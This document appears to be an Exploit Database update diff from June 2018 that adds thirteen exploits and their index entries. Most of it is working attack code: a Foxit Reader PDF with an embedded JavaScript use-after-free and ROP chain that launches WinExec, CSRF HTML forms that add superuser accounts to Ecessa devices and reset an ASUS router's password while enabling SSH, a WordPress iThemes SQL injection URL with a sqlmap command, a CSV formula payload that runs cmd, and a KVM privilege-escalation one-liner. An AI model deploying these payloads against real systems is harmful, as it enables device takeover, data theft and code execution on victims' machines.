DB: 2018-06-26

13 changes to exploits/shellcodes

KVM (Nested Virtualization) - L1 Guest Privilege Escalation

DIGISOL DG-BR4000NG - Buffer Overflow (PoC)

Foxit Reader 9.0.1.1049 - Remote Code Execution

WordPress Plugin iThemes Security < 7.0.3 - SQL Injection

phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)

phpMyAdmin 4.8.1 - Local File Inclusion
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection
Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)
Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
DIGISOL DG-BR4000NG - Cross-Site Scripting
Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
Intex Router N-150 - Arbitrary File Upload
WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection

exploits/hardware/dos/44934.txt

@@ -0,0 +1,20 @@
+# Exploit Title: DIGISOL DG-BR4000NG - Buffer Overflow (PoC)
+# Date 2018-06-24
+# Vendor Homepage† http://www.digisol.com
+# Hardware Link httpswww.amazon.inDigisol-DG-BR4000NG-Wireless-Broadband-802-11ndpB00A19EHYK
+# Version: DIGISOL DG-BR4000NG Wireless Router
+# Category Hardware
+# Exploit Author Adipta Basu
+# Tested on Mac OS High Sierra
+# CVE CVE-2018-12706
+
+# Reproduction Steps
+
+- Goto your Wifi Router Gateway [i.e http192.168.2.1]
+- Go to -- General Setup -- Wireless -- Basic Settings
+- Open BurpSuite
+- Reload the Page
+- Burp will capture the intercepts.
+- Add a string of 500 ì0îs after the Authorization Basic string
+- The router will restart.
+- Refresh the page, and the whole web interface will be faulty.

exploits/hardware/webapps/44933.txt

@@ -0,0 +1,40 @@
+# Exploit Title:​​ Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
+# Date: 2018-06-23
+# Exploit Author: Navina Asrani
+# Version: N-150
+# CVE : N/A
+# Category: Router Firmware
+
+# 1. Description
+# The firmware allows malicious request to be executed without verifying
+# source of request. This leads to arbitrary execution with malicious request
+# which will lead to the creation of a privileged user..
+
+# 2. Proof of Concept
+# Visit the application
+# Go to any router setting modification page and change the values,
+# create a request and observe the lack of CSRF tokens.
+# Craft an html page with all the details for the built-in admin
+# user creation and host it on a server
+# Upon the link being clicked by a logged in admin user,
+# immediately, the action will get executed
+# Exploitation Technique: A attacker can create a rogue admin user to gain
+# access to the application.
+
+# Exploit code:
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://192.168.0.1/goform/WizardHandle" method="POST">
+      <input type="hidden" name="GO" value="index&#46;asp" />
+      <input type="hidden" name="v12&#95;time" value="1529768448&#46;425" />
+      <input type="hidden" name="WANT1" value="3" />
+      <input type="hidden" name="isp" value="3" />
+      <input type="hidden" name="PUN" value="testuser&#95;k" />
+      <input type="hidden" name="PPW" value="123456" />
+      <input type="hidden" name="SSID" value="testwifiap" />
+      <input type="hidden" name="wirelesspassword" value="00000000" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/hardware/webapps/44935.txt

@@ -0,0 +1,20 @@
+# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
+# Date: 2018-06-24
+# Vendor Homepage:  http://www.digisol.com
+# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
+# Category: Hardware
+# Exploit Author: Adipta Basu
+# Contact : https://www.facebook.com/AdiptaBasu
+# Web: https://hackings8n.blogspot.com
+# Tested on: Mac OS High Sierra
+# CVE: CVE-2018-12705
+ 
+# Reproduction Steps:
+ 
+- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
+- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
+- Open BurpSuite
+- Change the SSID to "Testing" and hit "Apply"
+- Burp will capture the intercepts.
+- Now change the SSID to <script>alert("ADIPTA")</script>
+- Refresh the page, and you will get the "ADIPTA" pop-up

exploits/hardware/webapps/44936.txt

@@ -0,0 +1,54 @@
+# Exploit title: Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
+# Date: 2018-05-21
+# Author: LiquidWorm
+# Vendor: Ecessa Corporation
+# Product web page: https://www.ecessa.com
+# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
+
+# Summary: Ecessa's WANworX SD-WAN solutions increase network performance and
+# reliability by leveraging any connection. That can be premium priced MPLS,
+# lower cost broadband, or cellular 4G or LTE. Many of today’s WAN deployments
+# are based on older technology that was acceptable when businesses did not run
+# at breakneck speed or when operations didn’t grind to a halt when connectivity
+# was disrupted. In today’s cloud-based applications, datacenters and distributed
+# networks, where so much is virtualized and delivered as–a-service, limited
+# bandwidth and network outages don’t just slow productivity, they stop it.
+
+# Desc: The application interface allows users to perform certain actions via
+# HTTP requests without performing any validity checks to verify the requests.
+# This can be exploited to perform certain actions with administrative privileges
+# if a logged-in user visits a malicious web site.
+
+<html>
+  <body>
+    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
+      <input type="hidden" name="savecrtcfg" value="checked" />
+      <input type="hidden" name="user_username1" value="root" />
+      <input type="hidden" name="user_enabled1" value="on" />
+      <input type="hidden" name="user_passwd1" value="" />
+      <input type="hidden" name="user_passwd_verify1" value="" />
+      <input type="hidden" name="user_delete1" value="" />
+      <input type="hidden" name="user_username2" value="admin" />
+      <input type="hidden" name="user_passwd2" value="" />
+      <input type="hidden" name="user_passwd_verify2" value="" />
+      <input type="hidden" name="user_delete2" value="" />
+      <input type="hidden" name="user_username3" value="user" />
+      <input type="hidden" name="user_enabled3" value="on" />
+      <input type="hidden" name="user_passwd3" value="" />
+      <input type="hidden" name="user_passwd_verify3" value="" />
+      <input type="hidden" name="user_delete3" value="" />
+      <input type="hidden" name="user_username4" value="h4x0r" />
+      <input type="hidden" name="user_enabled4" value="on" />
+      <input type="hidden" name="user_superuser4" value="on" />
+      <input type="hidden" name="user_passwd4" value="123123" />
+      <input type="hidden" name="user_passwd_verify4" value="123123" />
+      <input type="hidden" name="users_num" value="4" />
+      <input type="hidden" name="page" value="util_configlogin" />
+      <input type="hidden" name="val_requested_page" value="user_accounts" />
+      <input type="hidden" name="savecrtcfg" value="checked" />
+      <input type="hidden" name="page_uuid" value="73f90fa3-2e60-4fd7-a792-1ff6c7513d92" />
+      <input type="hidden" name="form_has_changed" value="1" />
+      <input type="submit" value="Supersize!" />
+    </form>
+  </body>
+</html>

exploits/hardware/webapps/44937.txt

@@ -0,0 +1,28 @@
+# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
+# Date: 2018-06-23
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.asus.com/
+# Firmware Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC750GF/FW_RT_AC750GF_30043806038.zip
+# Firmware Version: 3.0.0.4.380.6038
+# Tested on: ASUS RT-AC750GF with default firmware version 3.0.0.4.380.6038
+
+# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token}
+# -> Change the router login password and enable SSH daemon)
+
+<html>
+<body>
+<p>Proof Of Concept</p>
+<!-- <form action="http://192.168.1.1/findasus.cgi" method="POST"> -->
+<form action="http://router.asus.com/findasus.cgi" method="POST">
+<input type="hidden" name="action_mode" value="refresh_networkmap" />
+<input type="text" id="current_page" name="current_page" value="" />
+<script>
+// set username at admin
+// set password at admin123
+// enable ssh daemon
+document.getElementById("current_page").value = "start_apply.htm?productid=RT-AC53&current_page=Advanced_System_Content.asp&next_page=Advanced_System_Content.asp&modified=0&action_mode=apply&action_wait=5&action_script=restart_time%3Brestart_upnp&http_username=admin&http_passwd=admin123&http_passwd2=admin123&v_password2=admin123&sshd_enable=1&sshd_port=22&sshd_pass=1&sshd_authkeys=";
+</script>
+<input type="submit" value="" />
+</form>
+</body>
+</html>

exploits/hardware/webapps/44938.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Ecessa ShieldLink SL175EHQ 10.7.4 - Cross-Site Request Forgery (Add Superuser)
+# Date: 2018-05-21
+# Vendor: Ecessa Corporation
+# Product web page: https://www.ecessa.com
+# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
+
+# Summary: Ecessa's ShieldLink 60, 175, 600,1200 & 4000 are advanced, yet highly
+# affordable secure WAN Optimization Controllers that incorporate all of the ISP/WAN
+# link.
+
+# Desc: The application interface allows users to perform certain actions via
+# HTTP requests without performing any validity checks to verify the requests.
+# This can be exploited to perform certain actions with administrative privileges
+# if a logged-in user visits a malicious web site.
+
+<html>
+  <body>
+    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
+      <input type="hidden" name="savecrtcfg" value="checked" />
+      <input type="hidden" name="user_username1" value="root" />
+      <input type="hidden" name="user_enabled1" value="on" />
+      <input type="hidden" name="user_passwd1" value="" />
+      <input type="hidden" name="user_passwd_verify1" value="" />
+      <input type="hidden" name="user_delete1" value="" />
+      <input type="hidden" name="user_username2" value="admin" />
+      <input type="hidden" name="user_passwd2" value="" />
+      <input type="hidden" name="user_passwd_verify2" value="" />
+      <input type="hidden" name="user_delete2" value="" />
+      <input type="hidden" name="user_username3" value="user" />
+      <input type="hidden" name="user_enabled3" value="on" />
+      <input type="hidden" name="user_passwd3" value="" />
+      <input type="hidden" name="user_passwd_verify3" value="" />
+      <input type="hidden" name="user_delete3" value="" />
+      <input type="hidden" name="user_username4" value="h4x0r" />
+      <input type="hidden" name="user_enabled4" value="on" />
+      <input type="hidden" name="user_superuser4" value="on" />
+      <input type="hidden" name="user_passwd4" value="123123" />
+      <input type="hidden" name="user_passwd_verify4" value="123123" />
+      <input type="hidden" name="users_num" value="4" />
+      <input type="hidden" name="page" value="util_configlogin" />
+      <input type="hidden" name="val_requested_page" value="user_accounts" />
+      <input type="hidden" name="savecrtcfg" value="checked" />
+      <input type="hidden" name="page_uuid" value="df220e51-db68-492e-a745-d14adfd2f4fb" />
+      <input type="hidden" name="form_has_changed" value="1" />
+      <input type="submit" value="Supersize!" />
+    </form>
+  </body>
+</html>

exploits/hardware/webapps/44939.txt

@@ -0,0 +1,17 @@
+# Exploit Title:​​ Intex Router N-150 - Arbitrary File Upload
+# Date: 2018-06-23
+# Exploit Author: Samrat Das
+# Version: N-150
+# CVE : N/A
+# Category: Router Firmware
+
+# 1. Description
+# The firmware allows malicious files to be uploaded without any checking of
+# extensions and allows filed to be uploaded.
+
+# 2. Proof of Concept
+
+- Visit the application
+- Go to the advanced settings post login
+- Under backup- restore page upload any random file extension and hit go.
+- Upon the file being upload, the firmware will get rebooted accepting the arbitrary file.

exploits/linux/dos/44944.txt

@@ -0,0 +1,24 @@
+When KVM (on Intel) virtualizes another hypervisor as L1 VM it does not verify that VMX instructions from the L1 VM (which trigger a VM exit and are emulated by L0 KVM) are coming from ring 0.
+
+For code running on bare metal or VMX root mode this is enforced by hardware. However, for code running in L1, the instruction always triggers a VM exit even when executed with cpl 3. This behavior is documented by Intel (example is for the VMPTRST instruction):
+
+(Intel Manual 30-18 Vol. 3C) 
+IF (register operand) or (not in VMX operation) or (CR0.PE = 0) or (RFLAGS.VM = 1) or (IA32_EFER.LMA = 1 and CS.L = 0)
+ THEN #UD;
+ELSIF in VMX non-root operation
+ THEN VMexit;
+ELSIF CPL > 0
+ THEN #GP(0);
+ELSE
+ 64-bit in-memory destination operand ← current-VMCS pointer;
+
+This means that a normal user space program running in the L1 VM can trigger KVMs VMX emulation which gives a large number of privilege escalation vectors (fake VMCS or vmptrld / vmptrst to a kernel address are the first that come to mind). As VMX emulation code checks for the guests CR4.VMXE value this only works if a L2 guest is running. 
+
+A somewhat realistic exploit scenario would involve someone breaking out of a L2 guest (for example by exploiting a bug in the L1 qemu process) and then using this bug for privilege escalation on the L1 system.  
+
+Simple POC (tested on L0 and L1 running Ubuntu 18.04 4.15.0-22-generic). 
+This requires that a L2 guest exists: 
+
+echo 'main(){asm volatile ("vmptrst 0xffffffffc0031337");}'| gcc -xc - ; ./a.out
+
+[ 2537.280319] BUG: unable to handle kernel paging request at ffffffffc0031337

exploits/linux/webapps/44932.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)
+# Author: LiquidWorm
+# Date: 2018-05-21
+# Vendor: Ecessa Corporation
+# Product web page: https://www.ecessa.com
+# Affected version: 10.7.4, 10.6.9, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24
+# Tested on: lighttpd/1.4.35
+
+# Summary: Internet Failover and Load Balancing for Small Businesses, Stores
+# and Branch Offices.
+
+# Desc: The application interface allows users to perform certain actions via
+# HTTP requests without performing any validity checks to verify the requests.
+# This can be exploited to perform certain actions with administrative privileges
+# if a logged-in user visits a malicious web site.
+
+<html>
+  <body>
+    <form action="https://Target/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
+      <input type="hidden" name="savecrtcfg" value="checked" />
+      <input type="hidden" name="user_username1" value="root" />
+      <input type="hidden" name="user_enabled1" value="on" />
+      <input type="hidden" name="user_passwd1" value="" />
+      <input type="hidden" name="user_passwd_verify1" value="" />
+      <input type="hidden" name="user_delete1" value="" />
+      <input type="hidden" name="user_username2" value="admin" />
+      <input type="hidden" name="user_passwd2" value="" />
+      <input type="hidden" name="user_passwd_verify2" value="" />
+      <input type="hidden" name="user_delete2" value="" />
+      <input type="hidden" name="user_username3" value="user" />
+      <input type="hidden" name="user_enabled3" value="on" />
+      <input type="hidden" name="user_passwd3" value="" />
+      <input type="hidden" name="user_passwd_verify3" value="" />
+      <input type="hidden" name="user_delete3" value="" />
+      <input type="hidden" name="user_username4" value="h4x0r" />
+      <input type="hidden" name="user_enabled4" value="on" />
+      <input type="hidden" name="user_superuser4" value="on" />
+      <input type="hidden" name="user_passwd4" value="123123" />
+      <input type="hidden" name="user_passwd_verify4" value="123123" />
+      <input type="hidden" name="users_num" value="4" />
+      <input type="hidden" name="page" value="util_configlogin" />
+      <input type="hidden" name="val_requested_page" value="user_accounts" />
+      <input type="hidden" name="savecrtcfg" value="checked" />
+      <input type="hidden" name="page_uuid" value="3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d" />
+      <input type="hidden" name="form_has_changed" value="1" />
+      <input type="submit" value="Supersize!" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/44931.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Wordpress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection
+# Google Dork: N/A
+# Date: 2018-06-24
+# Exploit Author: Bhushan B. Patil
+# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
+# Affected Version: 1.5.4 and before
+# Category: Plugins and Extensions
+# Tested on: WiN7_x64
+# CVE: CVE-2018-11525
+
+# 1. Application Description:
+# The plugin helps you to easily export WooCommerce order data. Export any custom field assigned 
+# to orders/products/coupons is easy and you can select from various formats to export the data 
+# in such as CSV, XLS, XML and JSON.
+
+# 2. Technical Description:
+# Advanced Order Export For WooCommerce plugin version 1.5.4 and before are affected by the vulnerability
+# Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of 
+# form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine,
+# the command is executed.
+
+# 3. Proof Of Concept:
+ 
+Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
+
+# When high privileged user logs into the application to export form data in CSV and opens the file.
+# Formula gets executed and calculator will get popped in his machine.

exploits/php/webapps/44940.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Wordpress Plugin Comments Import & Export < 2.0.4 - CSV Injection
+# Google Dork: N/A
+# Date: 2018-06-24
+# Exploit Author: Bhushan B. Patil
+# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/
+# Affected Version: 2.0.4 and before
+# Category: Plugins and Extensions
+# Tested on: WiN7_x64
+# CVE: CVE-2018-11526
+
+# 1. Application Description:
+# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store.
+
+# 2. Technical Description:
+# WordPress Comments Import & Export plugin version 2.0.4 and before are affected by the vulnerability Remote Command Execution
+# using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with
+# higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
+
+# 3. Proof Of Concept:
+Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
+When high privileged user logs into the application to export form data in CSV and opens the file.
+Formula gets executed and calculator will get popped in his machine.

exploits/php/webapps/44943.txt

@@ -0,0 +1,41 @@
+# Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection
+# Date: 2018-06-25
+# Exploit Author: Çlirim Emini
+
+# Website: https://www.sentry.co.com/
+# Vendor Homepage: https://ithemes.com/
+# Software Link: https://wordpress.org/plugins/better-wp-security/
+# Version/s: 7.0.2 and below
+# Patched Version: 7.0.3
+# CVE : 2018-12636
+# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099
+
+Plugin description:
+
+iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.
+
+Description:
+
+WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.
+
+Technical details:
+
+Parameter orderby is vulnerable because backend variable $sort_by_column
+is not escaped.
+
+File: better-wp-security/core/admin-pages/logs-list-table.php
+Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) {
+Line 272: $ sort_by_column = $_GET[' orderby '];
+
+File: better-wp-security/core/lib/log-util.php
+Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column ));
+
+Proof of Concept (PoC):
+
+The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:
+
+http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0
+
+Using SQLMAP:
+
+sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3

exploits/windows/remote/44941.txt

@@ -0,0 +1,211 @@
+%PDF 
+1 0 obj
+<</Pages 1 0 R /OpenAction 2 0 R>> 
+2 0 obj
+<</S /JavaScript /JS (
+
+/*
+Foxit Reader Remote Code Execution Exploit
+==========================================
+
+Written by: Steven Seeley (mr_me) of Source Incite
+Date: 22/06/2018
+Technical details: https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html
+Download: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
+Target version: Foxit Reader v9.0.1.1049 (sha1: e3bf26617594014f4af2ef2b72b4a86060ec229f)
+Tested on:
+    1. Windows 7 Ultimate x86 build 6.1.7601 sp1
+    2. Windows 10 Pro x86 v1803 build 10.0.17134
+Vulnerabilities leveraged:
+    1. CVE-2018-9948
+    2. CVE-2018-9958
+*/
+
+var heap_ptr   = 0;
+var foxit_base = 0;
+var pwn_array  = [];
+
+function prepare_heap(size){
+    /*
+        This function prepares the heap state between allocations
+        and frees to get a predictable memory address back. 
+    */
+    var arr = new Array(size);
+    for(var i = 0; i < size; i++){
+        arr[i] = this.addAnnot({type: "Text"});;
+        if (typeof arr[i] == "object"){
+            arr[i].destroy();
+        }
+    }
+}
+	
+function gc() {
+    /*
+        This is a simple garbage collector, written by the notorious @saelo
+        Greetz, mi amigo.
+    */
+    const maxMallocBytes = 128 * 0x100000;
+    for (var i = 0; i < 3; i++) {
+        var x = new ArrayBuffer(maxMallocBytes);
+    }
+}
+
+function alloc_at_leak(){
+    /*
+        This is the function that allocates at the leaked address
+    */
+    for (var i = 0; i < 0x64; i++){
+        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+    }
+}
+
+function control_memory(){
+    /*
+        This is the function that fills the memory address that we leaked
+    */
+    for (var i = 0; i < 0x64; i++){
+        for (var j = 0; j < pwn_array[i].length; j++){
+            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+        }
+    }
+}
+
+function leak_vtable(){
+    /*
+        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
+        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
+        Found by: bit from meepwn team
+    */
+
+    // alloc
+    var a = this.addAnnot({type: "Text"});
+
+    // free
+    a.destroy();
+    gc();
+	
+    // kinda defeat lfh randomization in win 10
+    prepare_heap(0x400);
+
+    // reclaim
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    // leak the vtable
+    var leaked = stolen[0] & 0xffff0000;
+
+    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
+    foxit_base = leaked - 0x01f50000;
+}
+
+function leak_heap_chunk(){
+    /*
+        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
+        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
+        Found by: bit from meepwn team
+    */
+
+    // alloc
+    var a = this.addAnnot({type: "Text"});
+	
+    // free
+    a.destroy();
+	
+    // kinda defeat lfh randomization in win 10
+    prepare_heap(0x400);
+		
+    // reclaim
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+    
+    // alloc at the freed location
+    alloc_at_leak();
+    
+    // leak a heap chunk of size 0x40
+    heap_ptr = stolen[1];
+}
+
+function reclaim(){
+    /*
+        This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
+        All gadgets are from FoxitReader.exe v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
+    */
+
+    var arr = new Array(0x10);
+    for (var i = 0; i < arr.length; i++) {
+        arr[i] = new ArrayBuffer(0x60);
+        var rop = new Int32Array(arr[i]);
+
+        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+        rop[0x02] = 0x72727272;              // junk
+        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+        rop[0x04] = 0xffffffff;              // ret of WinExec
+        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+        rop[0x0c] = 0x636c6163;              // calc
+        rop[0x0d] = 0x00000000;              // adios, amigo
+
+        for (var j = 0x0e; j < rop.length; j++) {
+            rop[j] = 0x71727374;
+        }
+    }
+}
+
+function trigger_uaf(){
+    /*
+        Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
+        ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
+        Found by: Steven Seeley (mr_me) of Source Incite
+    */
+
+    var that = this;
+    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+    var arr = [1];
+    Object.defineProperties(arr,{
+        "0":{ 
+            get: function () {
+
+                // free
+                that.getAnnot(0, "uaf").destroy();
+
+                // reclaim freed memory
+                reclaim();
+                return 1; 
+            }
+        }
+    });
+
+    // re-use
+    a.point = arr;
+}
+
+function main(){
+
+    // 1. Leak a heap chunk of size 0x40
+    leak_heap_chunk();
+
+    // 2. Leak vtable and calculate the base of Foxit Reader
+    leak_vtable();
+
+    // 3. Then fill the memory region from step 1 with a stack pivot
+    control_memory();
+
+    // 4. Trigger the uaf, reclaim the memory, pivot to rop and win
+    trigger_uaf();
+}
+
+if (app.platform == "WIN"){
+    if (app.isFoxit == "Foxit Reader"){
+        if (app.appFoxitVersion == "9.0.1.1049"){
+            main();
+        }
+    }
+}
+
+)>> trailer <</Root 1 0 R>>

files_exploits.csv

@@ -5987,6 +5987,7 @@ id,file,description,date,author,type,platform,port
 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
+44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux,
 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
@@ -6005,6 +6006,7 @@ id,file,description,date,author,type,platform,port
 44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
 44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
 44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
+44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16583,6 +16585,7 @@ id,file,description,date,author,type,platform,port
 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
 44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
+44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39540,6 +39543,7 @@ id,file,description,date,author,type,platform,port
 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
+44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80
 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
@@ -39579,6 +39583,15 @@ id,file,description,date,author,type,platform,port
 44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80
 44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80
 44922,exploits/php/webapps/44922.txt,"GreenCMS 2.3.0603 - Information Disclosure",2018-06-22,vr_system,webapps,php,
-44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion",2018-06-21,ChaMd5,webapps,php,
